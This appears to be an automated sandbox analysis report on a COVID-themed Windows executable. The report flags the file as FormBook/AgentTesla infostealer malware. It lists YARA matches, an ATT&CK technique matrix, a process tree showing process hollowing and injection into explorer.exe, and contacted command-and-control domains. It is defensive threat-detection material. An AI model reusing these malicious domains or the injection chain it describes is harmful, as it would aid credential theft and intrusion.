          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match | File source: 0000000F.00000002.481749515.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000F.00000002.484219002.0000000001960000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000F.00000002.484584798.0000000001990000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000013.00000002.597531412.0000000002F80000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000013.00000002.597396184.0000000002F50000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.434950366.0000000004299000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000013.00000002.596048220.0000000000B10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 15.2.COVID-19-Related Requirements.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 15.2.COVID-19-Related Requirements.exe.400000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match | File source: 0000000F.00000002.481749515.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000F.00000002.484219002.0000000001960000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000F.00000002.484584798.0000000001990000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000013.00000002.597531412.0000000002F80000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000013.00000002.597396184.0000000002F50000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.434950366.0000000004299000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000013.00000002.596048220.0000000000B10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 15.2.COVID-19-Related Requirements.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 15.2.COVID-19-Related Requirements.exe.400000.0.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

The matrix is listed one tactic column at a time, with the technique cells in row order. Digits in parentheses after a technique are the count badges attached to that cell in the report.

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Shared Modules (1); Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
Privilege Escalation: Process Injection (612); Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
Defense Evasion: Rootkit (1); Masquerading (1); Disable or Modify Tools (1); Virtualization/Sandbox Evasion (31); Process Injection (612); Deobfuscate/Decode Files or Information (11); Obfuscated Files or Information (4); Software Packing (3)
Credential Access: Credential API Hooking (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: Security Software Discovery (221); Process Discovery (2); Virtualization/Sandbox Evasion (31); Remote System Discovery (1); System Information Discovery (112); System Owner/User Discovery; Network Sniffing; Network Service Scanning
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot
Collection: Credential API Hooking (1); Archive Collected Data (11); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Command and Control: Encrypted Channel (1); Ingress Tool Transfer (1); Non-Application Layer Protocol (2); Application Layer Protocol (12); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue

Behavior Graph

Legend (node icons): Process; Signature; Created File; DNS/IP Info; Is Dropped; Is Windows Process; Number of created Registry Values; Number of created Files; Visual Basic; Delphi; Java; .Net C# or VB.NET; C, C++ or other language; Is malicious; Internet

Behavior Graph ID: 425178; Sample: COVID-19-Related Requirements.exe; Startdate: 26/05/2021; Architecture: WINDOWS; Score: 100

Start node signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 7 other signatures

Process tree recovered from the graph edges:

COVID-19-Related Requirements.exe (started)
    Created file: C:\...\COVID-19-Related Requirements.exe.log, ASCII (dropped)
    Signature: Injects a PE file into a foreign processes
    Started three child instances of COVID-19-Related Requirements.exe; the first of them:
        Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
        explorer.exe (injected)
            DNS/IP: www.portablesteamsaunas.com 52.58.78.16, 49748, 80, AMAZON-02US, United States
            Signature: System process connects to network (likely due to code injection or exploit)
            wscript.exe (started)
                Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                cmd.exe (started)
                    conhost.exe (started)

Screenshots

Thumbnails: screenshot images are not reproduced in this text export.

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

Source | Detection | Scanner | Label
COVID-19-Related Requirements.exe | 23% | Virustotal |
COVID-19-Related Requirements.exe | 26% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
COVID-19-Related Requirements.exe | 100% | Joe Sandbox ML |

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

Source | Detection | Scanner | Label
15.2.COVID-19-Related Requirements.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          No Antivirus matches

          URLs

Source | Detection | Scanner | Label
http://www.portablesteamsaunas.com | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.fontbureau.commQ | 0% | Avira URL Cloud | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.fontbureau.comcom | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.portablesteamsaunas.com/ | 0% | Avira URL Cloud | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe
www.tiffanysbeautybling.com/cgsp/ | 0% | Avira URL Cloud | safe

          Domains and IPs

          Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.portablesteamsaunas.com | 52.58.78.16 | true | true | | unknown

            Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
www.tiffanysbeautybling.com/cgsp/ | true | Avira URL Cloud: safe | low

            URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.autoitscript.com/autoit3/J | explorer.exe, 00000010.00000000.435521033.000000000095C000.00000004.00000020.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0 | COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com | COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com/designersG | COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmp | false | | high
http://www.portablesteamsaunas.com | wscript.exe, 00000013.00000002.600969129.000000000579F000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
